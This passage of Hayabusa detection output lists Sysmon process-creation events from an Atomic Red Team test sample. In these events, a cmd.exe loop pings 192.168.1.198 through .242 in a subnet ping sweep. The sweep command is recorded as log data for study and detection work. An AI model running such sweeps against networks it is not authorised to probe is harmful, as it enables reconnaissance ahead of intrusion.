747F3D96-D959-5D31-0000-001016DE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 
747F3D96-D960-5D31-0000-001057133700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 
747F3D96-D968-5D31-0000-001001553700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
